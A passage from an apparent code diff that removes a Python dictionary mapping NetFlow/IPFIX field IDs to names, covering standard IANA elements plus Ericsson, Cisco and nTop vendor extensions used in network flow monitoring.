"DST_AS_PEER", - 129: "SRC_AS_PEER", - 130: "exporterIPv4Address", - 131: "exporterIPv6Address", - 132: "DROPPED_BYTES", - 133: "DROPPED_PACKETS", - 134: "DROPPED_BYTES_TOTAL", - 135: "DROPPED_PACKETS_TOTAL", - 136: "flowEndReason", - 137: "commonPropertiesId", - 138: "observationPointId", - 139: "icmpTypeCodeIPv6", - 140: "MPLS_TOP_LABEL_IPv6_ADDRESS", - 141: "lineCardId", - 142: "portId", - 143: "meteringProcessId", - 144: "FLOW_EXPORTER", - 145: "templateId", - 146: "wlanChannelId", - 147: "wlanSSID", - 148: "flowId", - 149: "observationDomainId", - 150: "flowStartSeconds", - 151: "flowEndSeconds", - 152: "flowStartMilliseconds", - 153: "flowEndMilliseconds", - 154: "flowStartMicroseconds", - 155: "flowEndMicroseconds", - 156: "flowStartNanoseconds", - 157: "flowEndNanoseconds", - 158: "flowStartDeltaMicroseconds", - 159: "flowEndDeltaMicroseconds", - 160: "systemInitTimeMilliseconds", - 161: "flowDurationMilliseconds", - 162: "flowDurationMicroseconds", - 163: "observedFlowTotalCount", - 164: "ignoredPacketTotalCount", - 165: "ignoredOctetTotalCount", - 166: "notSentFlowTotalCount", - 167: "notSentPacketTotalCount", - 168: "notSentOctetTotalCount", - 169: "destinationIPv6Prefix", - 170: "sourceIPv6Prefix", - 171: "postOctetTotalCount", - 172: "postPacketTotalCount", - 173: "flowKeyIndicator", - 174: "postMCastPacketTotalCount", - 175: "postMCastOctetTotalCount", - 176: "ICMP_IPv4_TYPE", - 177: "ICMP_IPv4_CODE", - 178: "ICMP_IPv6_TYPE", - 179: "ICMP_IPv6_CODE", - 180: "UDP_SRC_PORT", - 181: "UDP_DST_PORT", - 182: "TCP_SRC_PORT", - 183: "TCP_DST_PORT", - 184: "TCP_SEQ_NUM", - 185: "TCP_ACK_NUM", - 186: "TCP_WINDOW_SIZE", - 187: "TCP_URGENT_PTR", - 188: "TCP_HEADER_LEN", - 189: "IP_HEADER_LEN", - 190: "IP_TOTAL_LEN", - 191: "payloadLengthIPv6", - 192: "IP_TTL", - 193: "nextHeaderIPv6", - 194: "mplsPayloadLength", - 195: "IP_DSCP", - 196: "IP_PRECEDENCE", - 197: "IP_FRAGMENT_FLAGS", - 198: "DELTA_BYTES_SQUARED", - 199: "TOTAL_BYTES_SQUARED", - 200: "MPLS_TOP_LABEL_TTL", - 201: "MPLS_LABEL_STACK_OCTETS", - 202: "MPLS_LABEL_STACK_DEPTH", - 203: "MPLS_TOP_LABEL_EXP", - 204: "IP_PAYLOAD_LENGTH", - 205: "UDP_LENGTH", - 206: "IS_MULTICAST", - 207: "IP_HEADER_WORDS", - 208: "IP_OPTION_MAP", - 209: "TCP_OPTION_MAP", - 210: "paddingOctets", - 211: "collectorIPv4Address", - 212: "collectorIPv6Address", - 213: "collectorInterface", - 214: "collectorProtocolVersion", - 215: "collectorTransportProtocol", - 216: "collectorTransportPort", - 217: "exporterTransportPort", - 218: "tcpSynTotalCount", - 219: "tcpFinTotalCount", - 220: "tcpRstTotalCount", - 221: "tcpPshTotalCount", - 222: "tcpAckTotalCount", - 223: "tcpUrgTotalCount", - 224: "ipTotalLength", - 225: "postNATSourceIPv4Address", - 226: "postNATDestinationIPv4Address", - 227: "postNAPTSourceTransportPort", - 228: "postNAPTDestinationTransportPort", - 229: "natOriginatingAddressRealm", - 230: "natEvent", - 231: "initiatorOctets", - 232: "responderOctets", - 233: "firewallEvent", - 234: "ingressVRFID", - 235: "egressVRFID", - 236: "VRFname", - 237: "postMplsTopLabelExp", - 238: "tcpWindowScale", - 239: "biflowDirection", - 240: "ethernetHeaderLength", - 241: "ethernetPayloadLength", - 242: "ethernetTotalLength", - 243: "dot1qVlanId", - 244: "dot1qPriority", - 245: "dot1qCustomerVlanId", - 246: "dot1qCustomerPriority", - 247: "metroEvcId", - 248: "metroEvcType", - 249: "pseudoWireId", - 250: "pseudoWireType", - 251: "pseudoWireControlWord", - 252: "ingressPhysicalInterface", - 253: "egressPhysicalInterface", - 254: "postDot1qVlanId", - 255: "postDot1qCustomerVlanId", - 256: "ethernetType", - 257: "postIpPrecedence", - 258: "collectionTimeMilliseconds", - 259: "exportSctpStreamId", - 260: "maxExportSeconds", - 261: "maxFlowEndSeconds", - 262: "messageMD5Checksum", - 263: "messageScope", - 264: "minExportSeconds", - 265: "minFlowStartSeconds", - 266: "opaqueOctets", - 267: "sessionScope", - 268: "maxFlowEndMicroseconds", - 269: "maxFlowEndMilliseconds", - 270: "maxFlowEndNanoseconds", - 271: "minFlowStartMicroseconds", - 272: "minFlowStartMilliseconds", - 273: "minFlowStartNanoseconds", - 274: "collectorCertificate", - 275: "exporterCertificate", - 276: "dataRecordsReliability", - 277: "observationPointType", - 278: "newConnectionDeltaCount", - 279: "connectionSumDurationSeconds", - 280: "connectionTransactionId", - 281: "postNATSourceIPv6Address", - 282: "postNATDestinationIPv6Address", - 283: "natPoolId", - 284: "natPoolName", - 285: "anonymizationFlags", - 286: "anonymizationTechnique", - 287: "informationElementIndex", - 288: "p2pTechnology", - 289: "tunnelTechnology", - 290: "encryptedTechnology", - 291: "basicList", - 292: "subTemplateList", - 293: "subTemplateMultiList", - 294: "bgpValidityState", - 295: "IPSecSPI", - 296: "greKey", - 297: "natType", - 298: "initiatorPackets", - 299: "responderPackets", - 300: "observationDomainName", - 301: "selectionSequenceId", - 302: "selectorId", - 303: "informationElementId", - 304: "selectorAlgorithm", - 305: "samplingPacketInterval", - 306: "samplingPacketSpace", - 307: "samplingTimeInterval", - 308: "samplingTimeSpace", - 309: "samplingSize", - 310: "samplingPopulation", - 311: "samplingProbability", - 312: "dataLinkFrameSize", - 313: "IP_SECTION HEADER", - 314: "IP_SECTION PAYLOAD", - 315: "dataLinkFrameSection", - 316: "mplsLabelStackSection", - 317: "mplsPayloadPacketSection", - 318: "selectorIdTotalPktsObserved", - 319: "selectorIdTotalPktsSelected", - 320: "absoluteError", - 321: "relativeError", - 322: "observationTimeSeconds", - 323: "observationTimeMilliseconds", - 324: "observationTimeMicroseconds", - 325: "observationTimeNanoseconds", - 326: "digestHashValue", - 327: "hashIPPayloadOffset", - 328: "hashIPPayloadSize", - 329: "hashOutputRangeMin", - 330: "hashOutputRangeMax", - 331: "hashSelectedRangeMin", - 332: "hashSelectedRangeMax", - 333: "hashDigestOutput", - 334: "hashInitialiserValue", - 335: "selectorName", - 336: "upperCILimit", - 337: "lowerCILimit", - 338: "confidenceLevel", - 339: "informationElementDataType", - 340: "informationElementDescription", - 341: "informationElementName", - 342: "informationElementRangeBegin", - 343: "informationElementRangeEnd", - 344: "informationElementSemantics", - 345: "informationElementUnits", - 346: "privateEnterpriseNumber", - 347: "virtualStationInterfaceId", - 348: "virtualStationInterfaceName", - 349: "virtualStationUUID", - 350: "virtualStationName", - 351: "layer2SegmentId", - 352: "layer2OctetDeltaCount", - 353: "layer2OctetTotalCount", - 354: "ingressUnicastPacketTotalCount", - 355: "ingressMulticastPacketTotalCount", - 356: "ingressBroadcastPacketTotalCount", - 357: "egressUnicastPacketTotalCount", - 358: "egressBroadcastPacketTotalCount", - 359: "monitoringIntervalStartMilliSeconds", - 360: "monitoringIntervalEndMilliSeconds", - 361: "portRangeStart", - 362: "portRangeEnd", - 363: "portRangeStepSize", - 364: "portRangeNumPorts", - 365: "staMacAddress", - 366: "staIPv4Address", - 367: "wtpMacAddress", - 368: "ingressInterfaceType", - 369: "egressInterfaceType", - 370: "rtpSequenceNumber", - 371: "userName", - 372: "applicationCategoryName", - 373: "applicationSubCategoryName", - 374: "applicationGroupName", - 375: "originalFlowsPresent", - 376: "originalFlowsInitiated", - 377: "originalFlowsCompleted", - 378: "distinctCountOfSourceIPAddress", - 379: "distinctCountOfDestinationIPAddress", - 380: "distinctCountOfSourceIPv4Address", - 381: "distinctCountOfDestinationIPv4Address", - 382: "distinctCountOfSourceIPv6Address", - 383: "distinctCountOfDestinationIPv6Address", - 384: "valueDistributionMethod", - 385: "rfc3550JitterMilliseconds", - 386: "rfc3550JitterMicroseconds", - 387: "rfc3550JitterNanoseconds", - 388: "dot1qDEI", - 389: "dot1qCustomerDEI", - 390: "flowSelectorAlgorithm", - 391: "flowSelectedOctetDeltaCount", - 392: "flowSelectedPacketDeltaCount", - 393: "flowSelectedFlowDeltaCount", - 394: "selectorIDTotalFlowsObserved", - 395: "selectorIDTotalFlowsSelected", - 396: "samplingFlowInterval", - 397: "samplingFlowSpacing", - 398: "flowSamplingTimeInterval", - 399: "flowSamplingTimeSpacing", - 400: "hashFlowDomain", - 401: "transportOctetDeltaCount", - 402: "transportPacketDeltaCount", - 403: "originalExporterIPv4Address", - 404: "originalExporterIPv6Address", - 405: "originalObservationDomainId", - 406: "intermediateProcessId", - 407: "ignoredDataRecordTotalCount", - 408: "dataLinkFrameType", - 409: "sectionOffset", - 410: "sectionExportedOctets", - 411: "dot1qServiceInstanceTag", - 412: "dot1qServiceInstanceId", - 413: "dot1qServiceInstancePriority", - 414: "dot1qCustomerSourceMacAddress", - 415: "dot1qCustomerDestinationMacAddress", - 416: "deprecated [dup of layer2OctetDeltaCount]", - 417: "postLayer2OctetDeltaCount", - 418: "postMCastLayer2OctetDeltaCount", - 419: "deprecated [dup of layer2OctetTotalCount", - 420: "postLayer2OctetTotalCount", - 421: "postMCastLayer2OctetTotalCount", - 422: "minimumLayer2TotalLength", - 423: "maximumLayer2TotalLength", - 424: "droppedLayer2OctetDeltaCount", - 425: "droppedLayer2OctetTotalCount", - 426: "ignoredLayer2OctetTotalCount", - 427: "notSentLayer2OctetTotalCount", - 428: "layer2OctetDeltaSumOfSquares", - 429: "layer2OctetTotalSumOfSquares", - 430: "layer2FrameDeltaCount", - 431: "layer2FrameTotalCount", - 432: "pseudoWireDestinationIPv4Address", - 433: "ignoredLayer2FrameTotalCount", - 434: "mibObjectValueInteger", - 435: "mibObjectValueOctetString", - 436: "mibObjectValueOID", - 437: "mibObjectValueBits", - 438: "mibObjectValueIPAddress", - 439: "mibObjectValueCounter", - 440: "mibObjectValueGauge", - 441: "mibObjectValueTimeTicks", - 442: "mibObjectValueUnsigned", - 443: "mibObjectValueTable", - 444: "mibObjectValueRow", - 445: "mibObjectIdentifier", - 446: "mibSubIdentifier", - 447: "mibIndexIndicator", - 448: "mibCaptureTimeSemantics", - 449: "mibContextEngineID", - 450: "mibContextName", - 451: "mibObjectName", - 452: "mibObjectDescription", - 453: "mibObjectSyntax", - 454: "mibModuleName", - 455: "mobileIMSI", - 456: "mobileMSISDN", - 457: "httpStatusCode", - 458: "sourceTransportPortsLimit", - 459: "httpRequestMethod", - 460: "httpRequestHost", - 461: "httpRequestTarget", - 462: "httpMessageVersion", - 463: "natInstanceID", - 464: "internalAddressRealm", - 465: "externalAddressRealm", - 466: "natQuotaExceededEvent", - 467: "natThresholdEvent", - 468: "httpUserAgent", - 469: "httpContentType", - 470: "httpReasonPhrase", - 471: "maxSessionEntries", - 472: "maxBIBEntries", - 473: "maxEntriesPerUser", - 474: "maxSubscribers", - 475: "maxFragmentsPendingReassembly", - 476: "addressPoolHighThreshold", - 477: "addressPoolLowThreshold", - 478: "addressPortMappingHighThreshold", - 479: "addressPortMappingLowThreshold", - 480: "addressPortMappingPerUserHighThreshold", - 481: "globalAddressMappingHighThreshold", - - # Ericsson NAT Logging - 24628: "NAT_LOG_FIELD_IDX_CONTEXT_ID", - 24629: "NAT_LOG_FIELD_IDX_CONTEXT_NAME", - 24630: "NAT_LOG_FIELD_IDX_ASSIGN_TS_SEC", - 24631: "NAT_LOG_FIELD_IDX_UNASSIGN_TS_SEC", - 24632: "NAT_LOG_FIELD_IDX_IPV4_INT_ADDR", - 24633: "NAT_LOG_FIELD_IDX_IPV4_EXT_ADDR", - 24634: "NAT_LOG_FIELD_IDX_EXT_PORT_FIRST", - 24635: "NAT_LOG_FIELD_IDX_EXT_PORT_LAST", - # Cisco ASA5500 Series NetFlow - 33000: "INGRESS_ACL_ID", - 33001: "EGRESS_ACL_ID", - 33002: "FW_EXT_EVENT", - # Cisco TrustSec - 34000: "SGT_SOURCE_TAG", - 34001: "SGT_DESTINATION_TAG", - 34002: "SGT_SOURCE_NAME", - 34003: "SGT_DESTINATION_NAME", - # medianet performance monitor - 37000: "PACKETS_DROPPED", - 37003: "BYTE_RATE", - 37004: "APPLICATION_MEDIA_BYTES", - 37006: "APPLICATION_MEDIA_BYTE_RATE", - 37007: "APPLICATION_MEDIA_PACKETS", - 37009: "APPLICATION_MEDIA_PACKET_RATE", - 37011: "APPLICATION_MEDIA_EVENT", - 37012: "MONITOR_EVENT", - 37013: "TIMESTAMP_INTERVAL", - 37014: "TRANSPORT_PACKETS_EXPECTED", - 37016: "TRANSPORT_ROUND_TRIP_TIME", - 37017: "TRANSPORT_EVENT_PACKET_LOSS", - 37019: "TRANSPORT_PACKETS_LOST", - 37021: "TRANSPORT_PACKETS_LOST_RATE", - 37022: "TRANSPORT_RTP_SSRC", - 37023: "TRANSPORT_RTP_JITTER_MEAN", - 37024: "TRANSPORT_RTP_JITTER_MIN", - 37025: "TRANSPORT_RTP_JITTER_MAX", - 37041: "TRANSPORT_RTP_PAYLOAD_TYPE", - 37071: "TRANSPORT_BYTES_OUT_OF_ORDER", - 37074: "TRANSPORT_PACKETS_OUT_OF_ORDER", - 37083: "TRANSPORT_TCP_WINDOWS_SIZE_MIN", - 37084: "TRANSPORT_TCP_WINDOWS_SIZE_MAX", - 37085: "TRANSPORT_TCP_WINDOWS_SIZE_MEAN", - 37086: "TRANSPORT_TCP_MAXIMUM_SEGMENT_SIZE", - # Cisco ASA 5500 - 40000: "AAA_USERNAME", - 40001: "XLATE_SRC_ADDR_IPV4", - 40002: "XLATE_DST_ADDR_IPV4", - 40003: "XLATE_SRC_PORT", - 40004: "XLATE_DST_PORT", - 40005: "FW_EVENT", - # v9 nTop extensions - 80 + NTOP_BASE: "SRC_FRAGMENTS", - 81 + NTOP_BASE: "DST_FRAGMENTS", - 82 + NTOP_BASE: "SRC_TO_DST_MAX_THROUGHPUT", - 83 + NTOP_BASE: "SRC_TO_DST_MIN_THROUGHPUT", - 84 + NTOP_BASE: "SRC_TO_DST_AVG_THROUGHPUT", - 85 + NTOP_BASE: "SRC_TO_SRC_MAX_THROUGHPUT", - 86 + NTOP_BASE: "SRC_TO_SRC_MIN_THROUGHPUT", - 87 + NTOP_BASE: "SRC_TO_SRC_AVG_THROUGHPUT", - 88 + NTOP_BASE: "NUM_PKTS_UP_TO_128_BYTES", - 89 + NTOP_BASE: "NUM_PKTS_128_TO_256_BYTES", - 90 + NTOP_BASE: "NUM_PKTS_256_TO_512_BYTES", - 91 + NTOP_BASE: "NUM_PKTS_512_TO_1024_BYTES", - 92 + NTOP_BASE: "NUM_PKTS_1024_TO_1514_BYTES", - 93 + NTOP_BASE: "NUM_PKTS_OVER_1514_BYTES", - 98 + NTOP_BASE: "CUMULATIVE_ICMP_TYPE", - 101 + NTOP_BASE: "SRC_IP_COUNTRY", - 102 + NTOP_BASE: "SRC_IP_CITY", - 103 + NTOP_BASE: "DST_IP_COUNTRY", - 104 + NTOP_BASE: "DST_IP_CITY", - 105 + NTOP_BASE: "FLOW_PROTO_PORT", - 106 + NTOP_BASE: "UPSTREAM_TUNNEL_ID", - 107 + NTOP_BASE: "LONGEST_FLOW_PKT", - 108 + NTOP_BASE: "SHORTEST_FLOW_PKT", - 109 + NTOP_BASE: "RETRANSMITTED_IN_PKTS", - 110 + NTOP_BASE: "RETRANSMITTED_OUT_PKTS", - 111 + NTOP_BASE: "OOORDER_IN_PKTS", - 112 + NTOP_BASE: "OOORDER_OUT_PKTS", - 113 + NTOP_BASE: "UNTUNNELED_PROTOCOL", - 114 + NTOP_BASE: "UNTUNNELED_IPV4_SRC_ADDR", - 115 + NTOP_BASE: "UNTUNNELED_L4_SRC_PORT", - 116 + NTOP_BASE: "UNTUNNELED_IPV4_DST_ADDR", - 117 + NTOP_BASE: "UNTUNNELED_L4_DST_PORT", - 118 + NTOP_BASE: "L7_PROTO", - 119 + NTOP_BASE: "L7_PROTO_NAME", - 120 + NTOP_BASE: "DOWNSTREAM_TUNNEL_ID", - 121 + NTOP_BASE: "FLOW_USER_NAME", - 122 + NTOP_BASE: "FLOW_SERVER_NAME", - 123 + NTOP_BASE: "CLIENT_NW_LATENCY_MS", - 124 + NTOP_BASE: "SERVER_NW_LATENCY_MS", - 125 + NTOP_BASE: "APPL_LATENCY_MS", - 126 + NTOP_BASE: "PLUGIN_NAME", - 127 + NTOP_BASE: "RETRANSMITTED_IN_BYTES", - 128 + NTOP_BASE: "RETRANSMITTED_OUT_BYTES", - 130 + NTOP_BASE: "SIP_CALL_ID", - 131 + NTOP_BASE: "SIP_CALLING_PARTY", - 132 + NTOP_BASE: "SIP_CALLED_PARTY", - 133 + NTOP_BASE: "SIP_RTP_CODECS", - 134 + NTOP_BASE: "SIP_INVITE_TIME", - 135 + NTOP_BASE: "SIP_TRYING_TIME", - 136 + NTOP_BASE: "SIP_RINGING_TIME", - 137 + NTOP_BASE: "SIP_INVITE_OK_TIME", - 138 + NTOP_BASE: "SIP_INVITE_FAILURE_TIME", - 139 + NTOP_BASE: "SIP_BYE_TIME", - 140 + NTOP_BASE: "SIP_BYE_OK_TIME", - 141 + NTOP_BASE: "SIP_CANCEL_TIME", - 142 + NTOP_BASE: "SIP_CANCEL_OK_TIME", - 143 + NTOP_BASE: "SIP_RTP_IPV4_SRC_ADDR", - 144 + NTOP_BASE: "SIP_RTP_L4_SRC_PORT", - 145 + NTOP_BASE: "SIP_RTP_IPV4_DST_ADDR", - 146 + NTOP_BASE: "SIP_RTP_L4_DST_PORT", - 147 + NTOP_BASE: "SIP_RESPONSE_CODE", - 148 + NTOP_BASE: "SIP_REASON_CAUSE", - 150 + NTOP_BASE: "RTP_FIRST_SEQ", - 151 + NTOP_BASE: "RTP_FIRST_TS", - 152 + NTOP_BASE: "RTP_LAST_SEQ", - 153 + NTOP_BASE: "RTP_LAST_TS", - 154 + NTOP_BASE: "RTP_IN_JITTER", - 155 + NTOP_BASE: "RTP_OUT_JITTER", - 156 + NTOP_BASE: "RTP_IN_PKT_LOST", - 157 + NTOP_BASE: "RTP_OUT_PKT_LOST", - 158 + NTOP_BASE: "RTP_OUT_PAYLOAD_TYPE", - 159 + NTOP_BASE: "RTP_IN_MAX_DELTA", - 160 + NTOP_BASE: "RTP_OUT_MAX_DELTA", - 161 + NTOP_BASE: "RTP_IN_PAYLOAD_TYPE", - 168 + NTOP_BASE: "SRC_PROC_PID", - 169 + NTOP_BASE: "SRC_PROC_NAME", - 180 + NTOP_BASE: "HTTP_URL", - 181 + NTOP_BASE: "HTTP_RET_CODE", - 182 + NTOP_BASE: "HTTP_REFERER", - 183 + NTOP_BASE: "HTTP_UA", - 184 + NTOP_BASE: "HTTP_MIME", - 185 + NTOP_BASE: "SMTP_MAIL_FROM", - 186 + NTOP_BASE: "SMTP_RCPT_TO", - 187 + NTOP_BASE: "HTTP_HOST", - 188 + NTOP_BASE: "SSL_SERVER_NAME", - 189 + NTOP_BASE: "BITTORRENT_HASH", - 195 + NTOP_BASE: "MYSQL_SRV_VERSION", - 196 + NTOP_BASE: "MYSQL_USERNAME", - 197 + NTOP_BASE: "MYSQL_DB", - 198 + NTOP_BASE: "MYSQL_QUERY", - 199 + NTOP_BASE: "MYSQL_RESPONSE", - 200 + NTOP_BASE: "ORACLE_USERNAME", - 201 + NTOP_BASE: "ORACLE_QUERY", - 202 + NTOP_BASE: "ORACLE_RSP_CODE", - 203 + NTOP_BASE: "ORACLE_RSP_STRING", - 204 + NTOP_BASE: "ORACLE_QUERY_DURATION", - 205 + NTOP_BASE: "DNS_QUERY", - 206 + NTOP_BASE: "DNS_QUERY_ID", - 207 + NTOP_BASE: "DNS_QUERY_TYPE", - 208 + NTOP_BASE: "DNS_RET_CODE", - 209 + NTOP_BASE: "DNS_NUM_ANSWERS", - 210 + NTOP_BASE: "POP_USER", - 220 + NTOP_BASE: "GTPV1_REQ_MSG_TYPE", - 221 + NTOP_BASE: "GTPV1_RSP_MSG_TYPE", - 222 + NTOP_BASE: "GTPV1_C2S_TEID_DATA", - 223 + NTOP_BASE: "GTPV1_C2S_TEID_CTRL", - 224 + NTOP_BASE: "GTPV1_S2C_TEID_DATA", - 225 + NTOP_BASE: "GTPV1_S2C_TEID_CTRL", - 226 + NTOP_BASE: "GTPV1_END_USER_IP", - 227 + NTOP_BASE: "GTPV1_END_USER_IMSI", - 228 + NTOP_BASE: "GTPV1_END_USER_MSISDN", - 229 + NTOP_BASE: "GTPV1_END_USER_IMEI", - 230 + NTOP_BASE: "GTPV1_APN_NAME", - 231 + NTOP_BASE: "GTPV1_RAI_MCC", - 232 + NTOP_BASE: "GTPV1_RAI_MNC", - 233 + NTOP_BASE: "GTPV1_ULI_CELL_LAC", - 234 + NTOP_BASE: "GTPV1_ULI_CELL_CI", - 235 + NTOP_BASE: "GTPV1_ULI_SAC", - 236 + NTOP_BASE: "GTPV1_RAT_TYPE", - 240 + NTOP_BASE: "RADIUS_REQ_MSG_TYPE", - 241 + NTOP_BASE: "RADIUS_RSP_MSG_TYPE", - 242 + NTOP_BASE: "RADIUS_USER_NAME", - 243 + NTOP_BASE: "RADIUS_CALLING_STATION_ID", - 244 + NTOP_BASE: "RADIUS_CALLED_STATION_ID", - 245 + NTOP_BASE: "RADIUS_NAS_IP_ADDR", - 246 + NTOP_BASE: "RADIUS_NAS_IDENTIFIER", - 247 + NTOP_BASE: "RADIUS_USER_IMSI", - 248 + NTOP_BASE: "RADIUS_USER_IMEI", - 249 + NTOP_BASE: "RADIUS_FRAMED_IP_ADDR", - 250 + NTOP_BASE: "RADIUS_ACCT_SESSION_ID", - 251 + NTOP_BASE: "RADIUS_ACCT_STATUS_TYPE", - 252 + NTOP_BASE: "RADIUS_ACCT_IN_OCTETS", - 253 + NTOP_BASE: "RADIUS_ACCT_OUT_OCTETS", - 254 + NTOP_BASE: "RADIUS_ACCT_IN_PKTS", - 255 + NTOP_BASE: "RADIUS_ACCT_OUT_PKTS", - 260 + NTOP_BASE: "IMAP_LOGIN", - 270 + NTOP_BASE: "GTPV2_REQ_MSG_TYPE", - 271 + NTOP_BASE: "GTPV2_RSP_MSG_TYPE", - 272 + NTOP_BASE: "GTPV2_C2S_S1U_GTPU_TEID", - 273 + NTOP_BASE: "GTPV2_C2S_S1U_GTPU_IP", - 274 + NTOP_BASE: "GTPV2_S2C_S1U_GTPU_TEID", - 275 + NTOP_BASE: "GTPV2_S2C_S1U_GTPU_IP", - 276 + NTOP_BASE: "GTPV2_END_USER_IMSI", - 277 + NTOP_BASE: "GTPV2_END_USER_MSISDN", - 278 + NTOP_BASE: "GTPV2_APN_NAME", - 279 + NTOP_BASE: "GTPV2_ULI_MCC", - 280 + NTOP_BASE: "GTPV2_ULI_MNC", - 281 + NTOP_BASE: "GTPV2_ULI_CELL_TAC", - 282 + NTOP_BASE: "GTPV2_ULI_CELL_ID", - 283 + NTOP_BASE: "GTPV2_RAT_TYPE", - 284 + NTOP_BASE: "GTPV2_PDN_IP", - 285 + NTOP_BASE: "GTPV2_END_USER_IMEI", - 290 + NTOP_BASE: "SRC_AS_PATH_1", - 291 + NTOP_BASE: "SRC_AS_PATH_2", - 292 + NTOP_BASE: "SRC_AS_PATH_3", - 293 + NTOP_BASE: "SRC_AS_PATH_4", - 294 + NTOP_BASE: "SRC_AS_PATH_5", - 295 + NTOP_BASE: "SRC_AS_PATH_6", - 296 + NTOP_BASE: "SRC_AS_PATH_7", - 297 + NTOP_BASE: "SRC_AS_PATH_8", - 298 + NTOP_BASE: "SRC_AS_PATH_9", - 299 + NTOP_BASE: "SRC_AS_PATH_10", - 300 + NTOP_BASE: "DST_AS_PATH_1", - 301 + NTOP_BASE: "DST_AS_PATH_2", - 302 + NTOP_BASE: "DST_AS_PATH_3", - 303 + NTOP_BASE: "DST_AS_PATH_4", - 304 + NTOP_BASE: "DST_AS_PATH_5", - 305 + NTOP_BASE: "DST_AS_PATH_6", - 306 + NTOP_BASE: "DST_AS_PATH_7", - 307 + NTOP_BASE: "DST_AS_PATH_8", - 308 + NTOP_BASE: "DST_AS_PATH_9", - 309 + NTOP_BASE: "DST_AS_PATH_10", - 320 + NTOP_BASE: "MYSQL_APPL_LATENCY_USEC", - 321 + NTOP_BASE: "GTPV0_REQ_MSG_TYPE", - 322 + NTOP_BASE: "GTPV0_RSP_MSG_TYPE", - 323 + NTOP_BASE: "GTPV0_TID", - 324 + NTOP_BASE: "GTPV0_END_USER_IP", - 325 + NTOP_BASE: "GTPV0_END_USER_MSISDN", - 326 + NTOP_BASE: "GTPV0_APN_NAME", - 327 + NTOP_BASE: "GTPV0_RAI_MCC", - 328 + NTOP_BASE: "GTPV0_RAI_MNC", - 329 + NTOP_BASE: "GTPV0_RAI_CELL_LAC", - 330 + NTOP_BASE: "GTPV0_RAI_CELL_RAC", - 331 + NTOP_BASE: "GTPV0_RESPONSE_CAUSE", - 332 + NTOP_BASE: "GTPV1_RESPONSE_CAUSE", - 333 + NTOP_BASE: "GTPV2_RESPONSE_CAUSE", - 334 + NTOP_BASE: "NUM_PKTS_TTL_5_32", - 335 + NTOP_BASE: "NUM_PKTS_TTL_32_64", - 336 + NTOP_BASE: "NUM_PKTS_TTL_64_96", - 337 + NTOP_BASE: "NUM_PKTS_TTL_96_128", - 338 + NTOP_BASE: "NUM_PKTS_TTL_128_160", - 339 + NTOP_BASE: "NUM_PKTS_TTL_160_192", - 340 + NTOP_BASE: "NUM_PKTS_TTL_192_224", - 341 + NTOP_BASE: "NUM_PKTS_TTL_224_255", - 342 + NTOP_BASE: "GTPV1_RAI_LAC", - 343 + NTOP_BASE: "GTPV1_RAI_RAC", - 344 + NTOP_BASE: "GTPV1_ULI_MCC", - 345 + NTOP_BASE: "GTPV1_ULI_MNC", - 346 + NTOP_BASE: "NUM_PKTS_TTL_2_5", - 347 + NTOP_BASE: "NUM_PKTS_TTL_EQ_1", - 348 + NTOP_BASE: "RTP_SIP_CALL_ID", - 349 + NTOP_BASE: "IN_SRC_OSI_SAP", - 350 + NTOP_BASE: "OUT_DST_OSI_SAP", - 351 + NTOP_BASE: "WHOIS_DAS_DOMAIN", - 352 + NTOP_BASE: "DNS_TTL_ANSWER", - 353 + NTOP_BASE: "DHCP_CLIENT_MAC", - 354 + NTOP_BASE: "DHCP_CLIENT_IP", - 355 + NTOP_BASE: "DHCP_CLIENT_NAME", - 356 + NTOP_BASE: "FTP_LOGIN", - 357 + NTOP_BASE: "FTP_PASSWORD", - 358 + NTOP_BASE: "FTP_COMMAND", - 359 + NTOP_BASE: "FTP_COMMAND_RET_CODE", - 360 + NTOP_BASE: "HTTP_METHOD", - 361 + NTOP_BASE: "HTTP_SITE", - 362 + NTOP_BASE: "SIP_C_IP", - 363 + NTOP_BASE: "SIP_CALL_STATE", - 364 + NTOP_BASE: "EPP_REGISTRAR_NAME", - 365 + NTOP_BASE: "EPP_CMD", - 366 + NTOP_BASE: "EPP_CMD_ARGS", - 367 + NTOP_BASE: "EPP_RSP_CODE", - 368 + NTOP_BASE: "EPP_REASON_STR", - 369 + NTOP_BASE: "EPP_SERVER_NAME", - 370 + NTOP_BASE: "RTP_IN_MOS", - 371 + NTOP_BASE: "RTP_IN_R_FACTOR", - 372 + NTOP_BASE: "SRC_PROC_USER_NAME", - 373 + NTOP_BASE: "SRC_FATHER_PROC_PID", - 374 + NTOP_BASE: "SRC_FATHER_PROC_NAME", - 375 + NTOP_BASE: "DST_PROC_PID", - 376 + NTOP_BASE: "DST_PROC_NAME", - 377 + NTOP_BASE: "DST_PROC_USER_NAME", - 378 + NTOP_BASE: "DST_FATHER_PROC_PID", - 379 + NTOP_BASE: "DST_FATHER_PROC_NAME", - 380 + NTOP_BASE: "RTP_RTT", - 381 + NTOP_BASE: "RTP_IN_TRANSIT", - 382 + NTOP_BASE: "RTP_OUT_TRANSIT", - 383 + NTOP_BASE: "SRC_PROC_ACTUAL_MEMORY", - 384 + NTOP_BASE: "SRC_PROC_PEAK_MEMORY", - 385 + NTOP_BASE: "SRC_PROC_AVERAGE_CPU_LOAD", - 386 + NTOP_BASE: "SRC_PROC_NUM_PAGE_FAULTS", - 387 + NTOP_BASE: "DST_PROC_ACTUAL_MEMORY", - 388 + NTOP_BASE: "DST_PROC_PEAK_MEMORY", - 389 + NTOP_BASE: "DST_PROC_AVERAGE_CPU_LOAD", - 390 + NTOP_BASE: "DST_PROC_NUM_PAGE_FAULTS", - 391 + NTOP_BASE: "DURATION_IN", - 392 + NTOP_BASE: "DURATION_OUT", - 393 + NTOP_BASE: "SRC_PROC_PCTG_IOWAIT", - 394 + NTOP_BASE: "DST_PROC_PCTG_IOWAIT", - 395 + NTOP_BASE: "RTP_DTMF_TONES", - 396 + NTOP_BASE: "UNTUNNELED_IPV6_SRC_ADDR", - 397 + NTOP_BASE: "UNTUNNELED_IPV6_DST_ADDR", - 398 + NTOP_BASE: "DNS_RESPONSE", - 399 + NTOP_BASE: "DIAMETER_REQ_MSG_TYPE", - 400 + NTOP_BASE: "DIAMETER_RSP_MSG_TYPE", - 401 + NTOP_BASE: "DIAMETER_REQ_ORIGIN_HOST", - 402 + NTOP_BASE: "DIAMETER_RSP_ORIGIN_HOST", - 403 + NTOP_BASE: "DIAMETER_REQ_USER_NAME", - 404 + NTOP_BASE: "DIAMETER_RSP_RESULT_CODE", - 405 + NTOP_BASE: "DIAMETER_EXP_RES_VENDOR_ID", - 406 + NTOP_BASE: "DIAMETER_EXP_RES_RESULT_CODE", - 407 + NTOP_BASE: "S1AP_ENB_UE_S1AP_ID", - 408 + NTOP_BASE: "S1AP_MME_UE_S1AP_ID", 